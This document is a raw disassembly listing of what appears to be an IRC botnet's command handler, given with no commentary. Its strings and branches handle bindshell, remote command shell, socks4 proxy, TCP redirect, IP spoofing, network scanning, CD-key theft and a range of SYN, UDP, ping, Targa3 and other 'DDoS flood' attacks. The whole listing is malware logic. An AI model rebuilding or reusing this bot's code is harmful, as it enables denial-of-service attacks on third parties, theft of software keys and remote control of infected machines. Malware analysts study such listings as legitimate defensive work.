call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_402300
mov eax, [ebp+arg_8]
mov eax, [ebp+eax+var_8C]
cmp eax, ebx
jz loc_402300
cmp byte ptr [edi], 23h
jz loc_402300
push eax
push edi
push offset dword_43FD48
jmp loc_40202F
; ---------------------------------------------------------------------------
loc_40254E: ; CODE XREF: sub_401C87+8D5�j
push 32h
call ds:dword_4F534C ; Sleep
loc_402556: ; CODE XREF: sub_401C87+7A5�j
cmp [ebp+var_19EC], ebx
jz short loc_40254E
jmp short loc_402593
; ---------------------------------------------------------------------------
loc_402560: ; CODE XREF: sub_401C87+79F�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_43FD60
jmp loc_4085EB
; ---------------------------------------------------------------------------
loc_402571: ; CODE XREF: sub_401C87+6C6�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset unk_43FDA0
push eax
call sub_41EA60
add esp, 10h
loc_402593: ; CODE XREF: sub_401C87+8D7�j
; sub_401C87+A22�j ...
xor esi, esi
inc esi
jmp loc_406F42
; ---------------------------------------------------------------------------
loc_40259B: ; CODE XREF: sub_401C87+6BA�j
push [ebp+esi+var_8C]
push offset aChat ; "CHAT"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4026E6
cmp [ebp+var_A8], ebx
jz loc_4026BF
push 1Bh
call sub_40B8D3
test eax, eax
pop ecx
jnz loc_4026AE
push [ebp+esi+var_84]
lea eax, [ebp+var_2AA8]
push offset aS ; "%s"
push eax
call sub_41EA60
push [ebp+esi+var_80]
call sub_41E710
mov [ebp+var_2910], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2AB0], eax
lea eax, [ebp+var_C0]
push 7Fh
push eax
lea eax, [ebp+var_2990]
push eax
call sub_41E510
mov eax, [ebp+var_4]
mov [ebp+var_2908], eax
mov eax, [ebp+var_8]
mov [ebp+var_2904], eax
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_2C0]
push offset unk_43FDF0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 1Bh
push eax
call sub_40B691
add esp, 34h
mov [ebp+var_290C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2AB0]
push ebx
push eax
push offset sub_4165C7
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_290C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4026A1
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_43FE10
jmp loc_4085EB
; ---------------------------------------------------------------------------
loc_402699: ; CODE XREF: sub_401C87+A20�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4026A1: ; CODE XREF: sub_401C87+9FF�j
cmp [ebp+var_2900], ebx
jz short loc_402699
jmp loc_402593
; ---------------------------------------------------------------------------
loc_4026AE: ; CODE XREF: sub_401C87+945�j
lea eax, [ebp+var_C0]
push eax
push offset unk_43FE48
jmp loc_4085EB
; ---------------------------------------------------------------------------
loc_4026BF: ; CODE XREF: sub_401C87+935�j
lea eax, [ebp+var_C0]
push eax
push offset unk_43FE78
jmp loc_4085EB
; ---------------------------------------------------------------------------
loc_4026D0: ; CODE XREF: sub_401C87+69F�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, ds:byte_43F098
mov [edi], ecx
jnz loc_4076C4
loc_4026E6: ; CODE XREF: sub_401C87+929�j
mov edi, [edi]
push edi
push offset aLogin ; "login"
mov [ebp+arg_8], edi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409A6F
push edi
push offset asc_43FEB2 ; "l"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409A6F
cmp [ebp+var_A8], ebx
jnz short loc_402737
push [ebp+var_8C]
push offset a332_0 ; "332"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_409A67
loc_402737: ; CODE XREF: sub_401C87+A94�j
cmp [ebp+arg_28], ebx
jnz loc_409A67
xor edi, edi
cmp ds:dword_43FA40, ebx
jle loc_4028E4
mov [ebp+arg_20], offset dword_455180
loc_402755: ; CODE XREF: sub_401C87+AED�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_40277B
add [ebp+arg_20], 0B8h
inc edi
cmp edi, ds:dword_43FA40
jl short loc_402755
jmp loc_4028E4
; ---------------------------------------------------------------------------
loc_40277B: ; CODE XREF: sub_401C87+ADD�j
push offset asc_43FEB8 ; " :"
push [ebp+arg_0]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz loc_4076C4
mov cl, ds:byte_43F098
imul edi, 0B8h
mov [eax+2], cl
mov cl, ds:byte_43F098
mov [eax+3], cl
lea ecx, dword_455198[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_41E510
lea eax, dword_455180[edi]
add esp, 0Ch
mov [ebp+arg_8], 0Fh
mov [ebp+arg_20], eax
lea edi, [ebp+esi+var_50]
loc_4027D6: ; CODE XREF: sub_401C87+BF2�j
push [ebp+arg_8]
lea eax, [ebp+var_A0]
push offset aD ; "$%d-"
push eax
call sub_41EA60
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41EBB0
add esp, 14h
test eax, eax
jz short loc_402838
cmp [edi], ebx
jz short loc_40283C
push [ebp+arg_20]
call sub_41BC70
add [ebp+var_C], eax
pop ecx
jz short loc_402870
push dword ptr [edi-4]
push [ebp+var_C]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_402870
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4189CD
add esp, 0Ch
jmp short loc_402870
; ---------------------------------------------------------------------------
loc_402838: ; CODE XREF: sub_401C87+B77�j
cmp [edi], ebx
jnz short loc_402870
loc_40283C: ; CODE XREF: sub_401C87+B7B�j
lea eax, [ebp+var_A0]
push 2
push eax
lea eax, [ebp+var_94]
push eax
call sub_41E510
lea eax, [ebp+var_94]
mov [ebp+var_92], bl
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4189CD
add esp, 18h
loc_402870: ; CODE XREF: sub_401C87+B89�j
; sub_401C87+B9A�j ...
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg loc_4027D6
lea eax, [ebp+esi+var_50]
mov [ebp+arg_8], 10h
mov edi, eax
loc_40288C: ; CODE XREF: sub_401C87+C51�j
push [ebp+arg_8]
lea eax, [ebp+var_A0]
push offset aD_0 ; "$%d"
push eax
call sub_41EA60
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41EBB0
add esp, 14h
test eax, eax
jz short loc_4028CF
mov eax, [edi]
cmp eax, ebx
jz short loc_4028CF
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4189CD
add esp, 0Ch
loc_4028CF: ; CODE XREF: sub_401C87+C2D�j
; sub_401C87+C33�j
dec [ebp+arg_8]
sub edi, 4
cmp [ebp+arg_8], ebx
jg short loc_40288C
mov [ebp+var_2C4], 1
loc_4028E4: ; CODE XREF: sub_401C87+AC1�j
; sub_401C87+AEF�j
lea eax, [ebp+esi+var_90]
mov edi, [eax]
mov cl, [edi]
cmp cl, ds:byte_43F098
jz short loc_402903
cmp [ebp+var_2C4], ebx
jz loc_402AEC
loc_402903: ; CODE XREF: sub_401C87+C6E�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_4189CD
lea eax, [ebp+var_C0]
push eax
push offset aUser ; "$user"
push edi
call sub_4189CD
push [ebp+var_88]
push offset aChan ; "$chan"
push edi
call sub_4189CD
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40B38F
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_4189CD
add esp, 40h
push [ebp+arg_14]
push offset aServer ; "$server"
push edi
call sub_4189CD
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_41EBB0
add esp, 14h
jmp loc_402A6E
; ---------------------------------------------------------------------------
loc_40297A: ; CODE XREF: sub_401C87+DE9�j
push offset aChr_0 ; "$chr("
push [ebp+arg_0]
call sub_41EBB0
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41E510
lea eax, [ebp+var_A0]
push offset asc_43FEFE ; ")"
push eax
call sub_41F870
add esp, 1Ch
cmp [ebp+var_A0], 30h
jl short loc_4029C2
cmp [ebp+var_A0], 39h
jle short loc_4029D8
loc_4029C2: ; CODE XREF: sub_401C87+D30�j
push 3
lea eax, [ebp+var_A0]
push offset a63 ; "63"
push eax
call sub_41E510
add esp, 0Ch
loc_4029D8: ; CODE XREF: sub_401C87+D39�j
lea eax, [ebp+var_A0]
push eax
call sub_41E710
test eax, eax
pop ecx
jle short loc_4029FE
lea eax, [ebp+var_A0]
push eax
call sub_41E710
pop ecx
mov [ebp+var_94], al
jmp short loc_402A12
; ---------------------------------------------------------------------------
loc_4029FE: ; CODE XREF: sub_401C87+D60�j
call sub_41EB70
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_94], dl
loc_402A12: ; CODE XREF: sub_401C87+D75�j
lea eax, [ebp+var_A0]
mov [ebp+var_93], bl
push eax
call sub_41BC70
mov [ebp+arg_8], eax
push 0Ch
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_41E4B0
mov eax, [ebp+arg_8]
add eax, 6
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_10]
push eax
call sub_41E510
lea eax, [ebp+var_94]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_4189CD
push edi
push [ebp+arg_0]
call sub_41EBB0
add esp, 30h
loc_402A6E: ; CODE XREF: sub_401C87+CEE�j
test eax, eax
jnz loc_40297A
mov edi, 1FFh
lea eax, [ebp+var_4488]
push edi
push [ebp+arg_0]
push eax
call sub_41E510
lea eax, [ebp+var_4488]
push edi
push eax
lea eax, [ebp+var_4AF0]
push eax
call sub_41E510
lea eax, [ebp+var_4AF0]
push offset asc_43FF04 ; " "
push eax
call sub_41F870
xor edi, edi
add esp, 20h
mov [ebp+var_90], eax
inc edi
loc_402ABC: ; CODE XREF: sub_401C87+E4D�j
push 43FF06h
push ebx
call sub_41F870
mov [ebp+edi*4+var_90], eax
inc edi
pop ecx
cmp edi, 20h
pop ecx
jl short loc_402ABC
lea eax, [ebp+esi+var_90]
mov ecx, [eax]
cmp ecx, ebx
jz loc_4076C4
add ecx, 3
mov [eax], ecx
loc_402AEC: ; CODE XREF: sub_401C87+C76�j
mov edi, [eax]
push edi
push offset aRndnick_0 ; "rndnick"
mov [ebp+arg_8], edi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409A1A
push edi
push offset aRn ; "rn"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409A1A
push edi
push offset aDie ; "die"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404BA2
push edi
push offset aD_1 ; "d"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404BA2
push edi
push offset aLogout ; "logout"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404B04
push edi
push offset aLo ; "lo"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404B04
push edi
push offset aVersion ; "version"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404AF5
push edi
push offset aVer ; "ver"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404AF5
push edi
push offset aDedication ; "dedication"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404AEB
push edi
push offset aDed ; "ded"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404AEB
push edi
push offset aSpeedtest ; "speedtest"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404AD2
push edi
push offset aSt ; "st"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404AD2
push edi
push offset aSecure ; "secure"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4049D5
push edi
push offset aSec ; "sec"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4049D5
push edi
push offset aUnsecure ; "unsecure"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4049D5
push edi
push offset aUnsec ; "unsec"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4049D5
push edi
push offset aBindshell ; "bindshell"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4048D0
push edi
push offset aBd ; "bd"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4048D0
push edi
push offset aBindshellstop ; "bindshellstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402CAB
push [ebp+esi+var_8C]
push 6
push offset aServer_1 ; "Server"
push offset dword_43FF9C
loc_402C8F: ; CODE XREF: sub_401C87+1072�j
; sub_401C87+1098�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B919
add esp, 20h
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_402CAB: ; CODE XREF: sub_401C87+FF3�j
push edi
push offset aSocks4 ; "socks4"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4047AF
push edi
push offset aS4 ; "s4"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4047AF
push edi
push offset aSocks4stop ; "socks4stop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402CFB
push [ebp+esi+var_8C]
push 19h
push offset aServer_2 ; "Server"
push offset dword_43FFD0
jmp short loc_402C8F
; ---------------------------------------------------------------------------
loc_402CFB: ; CODE XREF: sub_401C87+105D�j
push edi
push offset aRloginstop ; "rloginstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402D24
push [ebp+esi+var_8C]
push 9
push offset aServer_3 ; "Server"
push offset dword_43FFF4
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402D24: ; CODE XREF: sub_401C87+1083�j
push edi
push offset aHttpstop ; "httpstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402D4D
push [ebp+esi+var_8C]
push 3
push offset aServer_4 ; "Server"
push offset dword_440018
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402D4D: ; CODE XREF: sub_401C87+10AC�j
push edi
push offset aLogstop ; "logstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402D76
push [ebp+esi+var_8C]
push 25h
push offset aLogList ; "Log list"
push offset dword_44003C
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402D76: ; CODE XREF: sub_401C87+10D5�j
push edi
push offset aRedirectstop ; "redirectstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402D9F
push [ebp+esi+var_8C]
push 18h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_440068
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402D9F: ; CODE XREF: sub_401C87+10FE�j
push edi
push offset dword_440078
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402DC8
push [ebp+esi+var_8C]
push 0Dh
push offset dword_440084
push offset dword_440090
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402DC8: ; CODE XREF: sub_401C87+1127�j
push edi
push offset aSynstop ; "synstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402DF1
push [ebp+esi+var_8C]
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_4400B0
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402DF1: ; CODE XREF: sub_401C87+1150�j
push edi
push offset aSkysynstop ; "skysynstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402E1A
push [ebp+esi+var_8C]
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_4400D8
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402E1A: ; CODE XREF: sub_401C87+1179�j
push edi
push offset aTarga3stop ; "targa3stop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402E43
push [ebp+esi+var_8C]
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_440104
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402E43: ; CODE XREF: sub_401C87+11A2�j
push edi
push offset aWonkstop ; "wonkstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402E6C
push [ebp+esi+var_8C]
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_44012C
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402E6C: ; CODE XREF: sub_401C87+11CB�j
push edi
push offset aPacketstop ; "packetstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_402FC2
mov esi, [ebp+esi+var_8C]
mov edi, [ebp+arg_4]
push esi
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_440150
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
push esi
push 0Eh
push offset dword_44015C
push offset dword_440168
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
add esp, 40h
push esi
push 17h
push offset dword_440174
push offset dword_440180
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
push esi
push 16h
push offset dword_44018C
push offset dword_440198
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
add esp, 40h
push esi
push 11h
push offset dword_4401A4
push offset dword_4401B4
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
push esi
push 12h
push offset dword_4401C4
push offset dword_4401D0
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
add esp, 40h
push esi
push 0Fh
push offset dword_4401DC
push offset dword_4401EC
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
push esi
push 13h
push offset dword_4401FC
push offset dword_44020C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
add esp, 40h
push esi
push 10h
push offset dword_44021C
push offset dword_44022C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B919
push ebx
push [ebp+var_4]
push offset unk_44023C
push [ebp+var_88]
push edi
call sub_409C75
add esp, 34h
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_402FC2: ; CODE XREF: sub_401C87+11F4�j
push edi
push offset aTsunamistop ; "tsunamistop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402FEB
push [ebp+esi+var_8C]
push 0Fh
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_44028C
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_402FEB: ; CODE XREF: sub_401C87+134A�j
push edi
push offset aWisdomstop ; "wisdomstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_403014
push [ebp+esi+var_8C]
push 13h
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_4402B8
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_403014: ; CODE XREF: sub_401C87+1373�j
push edi
push offset aUdpstop ; "udpstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40303D
push [ebp+esi+var_8C]
push 17h
push offset aUdpFlood ; "UDP flood"
push offset dword_4402DC
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_40303D: ; CODE XREF: sub_401C87+139C�j
push edi
push offset aPingstop ; "pingstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_403066
push [ebp+esi+var_8C]
push 16h
push offset aPingFlood ; "Ping flood"
push offset dword_440300
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_403066: ; CODE XREF: sub_401C87+13C5�j
push edi
push offset aTftpstop ; "tftpstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40308F
push [ebp+esi+var_8C]
push 5
push offset aServer_5 ; "Server"
push offset dword_440320
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_40308F: ; CODE XREF: sub_401C87+13EE�j
push edi
push offset aFindfilestop ; "findfilestop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404797
push edi
push offset aFfstop ; "ffstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404797
push edi
push offset aProcsstop ; "procsstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40477F
push edi
push offset aPsstop ; "psstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40477F
push edi
push offset aClonestop ; "clonestop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40310C
push [ebp+esi+var_8C]
push 1Fh
push offset aClone ; "Clone"
push offset dword_440370
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_40310C: ; CODE XREF: sub_401C87+146B�j
push edi
push offset aSecurestop ; "securestop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_403135
push [ebp+esi+var_8C]
push 22h
push offset aSecure_1 ; "Secure"
push offset dword_440394
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_403135: ; CODE XREF: sub_401C87+1494�j
push edi
push offset aScanstop ; "scanstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40315E
push [ebp+esi+var_8C]
push 0Bh
push offset aScan_0 ; "Scan"
push offset dword_4403B8
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_40315E: ; CODE XREF: sub_401C87+14BD�j
push edi
push offset aScanstats ; "scanstats"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404769
push edi
push offset aStats ; "stats"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404769
push edi
push offset aTransferstats ; "transferstats"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404753
push edi
push offset aTrstats ; "trstats"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404753
push edi
push offset aConnectbacksta ; "connectbackstats"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40473D
push edi
push offset aCbstats ; "cbstats"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40473D
push edi
push offset aExploitlist ; "exploitlist"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404727
push edi
push offset aExplist ; "explist"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404727
push edi
push offset aReconnect ; "reconnect"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404708
push edi
push offset aR ; "r"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404708
push edi
push offset aDisconnect ; "disconnect"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4046E6
push edi
push offset aDc ; "dc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4046E6
push edi
push offset aQuit_0 ; "quit"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40469D
push edi
push offset aQ ; "q"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40469D
push edi
push offset aStatus ; "status"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40465F
push edi
push offset aS_0 ; "s"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40465F
push edi
push offset aId ; "id"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404628
push edi
push offset aI ; "i"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404628
push edi
push offset aReboot ; "reboot"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40332A
call sub_418E8C
test eax, eax
mov eax, offset unk_440460
jnz short loc_4032FC
mov eax, offset unk_440480
loc_4032FC: ; CODE XREF: sub_401C87+166E�j
push eax
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 1Ch
jmp loc_402593
; ---------------------------------------------------------------------------
loc_40332A: ; CODE XREF: sub_401C87+1660�j
push edi
push offset aThreads ; "threads"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40453B
push edi
push offset aT ; "t"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40453B
push edi
push offset aAliases ; "aliases"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404518
push edi
push offset aAl ; "al"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404518
push edi
push offset aLog ; "log"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404429
push edi
push offset aLg ; "lg"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404429
push edi
push offset aClearlog ; "clearlog"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404410
push edi
push offset aClg ; "clg"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404410
push edi
push offset aNetinfo ; "netinfo"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4043D6
push edi
push offset aNi ; "ni"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4043D6
push edi
push offset aSysinfo ; "sysinfo"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4043AB
push edi
push offset aSi ; "si"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4043AB
push edi
push offset aRemove ; "remove"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404371
push edi
push offset aRm ; "rm"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404371
push edi
push offset aProcs ; "procs"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40424F
push edi
push offset aPs ; "ps"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40424F
push edi
push offset aGetcdkeys ; "getcdkeys"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404225
push edi
push offset aKey ; "key"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404225
push edi
push offset aUptime ; "uptime"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40419E
push edi
push offset aUp ; "up"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40419E
push edi
push offset aDriveinfo ; "driveinfo"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404181
push edi
push offset aDrv ; "drv"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404181
push edi
push offset aTestdlls ; "testdlls"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404168
push edi
push offset aDll ; "dll"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404168
push edi
push offset aOpencmd ; "opencmd"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404129
push edi
push offset aOcmd ; "ocmd"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_404129
push edi
push offset aCmdstop ; "cmdstop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_403575
push [ebp+esi+var_8C]
push 0Ah
push offset aRemoteShell ; "Remote shell"
push offset dword_44056C
jmp loc_402C8F
; ---------------------------------------------------------------------------
loc_403575: ; CODE XREF: sub_401C87+18D4�j
push edi
push offset dword_440578
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_403692
cmp [ebp+var_8], ebx
jnz short loc_4035A9
push ebx
push [ebp+var_4]
push offset dword_44057C
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_4035A9: ; CODE XREF: sub_401C87+1906�j
mov eax, [ebp+arg_18]
mov [ebp+arg_20], ebx
mov [ebp+arg_18], eax
jmp short loc_4035B7
; ---------------------------------------------------------------------------
loc_4035B4: ; CODE XREF: sub_401C87+197C�j
mov eax, [ebp+arg_18]
loc_4035B7: ; CODE XREF: sub_401C87+192B�j
cmp [eax], bl
jz short loc_4035BE
inc eax
jmp short loc_4035C3
; ---------------------------------------------------------------------------
loc_4035BE: ; CODE XREF: sub_401C87+1932�j
mov eax, offset dword_440590
loc_4035C3: ; CODE XREF: sub_401C87+1935�j
push eax
lea eax, [ebp+var_2C0]
push [ebp+arg_20]
push offset dword_440598
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add [ebp+arg_18], 80h
add esp, 24h
inc [ebp+arg_20]
cmp [ebp+arg_20], 3
jl short loc_4035B4
push offset unk_4405A0
call sub_415A3C
pop ecx
loc_403610: ; CODE XREF: sub_401C87+1C0B�j
; sub_401C87+2F2F�j
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_4076C4
push edi
push offset aSpoof ; "spoof"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_404CC2
mov esi, [ebp+arg_10]
push offset aOff ; "off"
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_404BC8
lea eax, [ebp+var_2C0]
push offset unk_4405D0
push eax
mov ds:dword_4E676C, ebx
call sub_41EA60
pop ecx
pop ecx
loc_403668: ; CODE XREF: sub_401C87+2FE2�j
; sub_401C87+3008�j ...
cmp [ebp+var_8], ebx
jnz loc_409A67
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
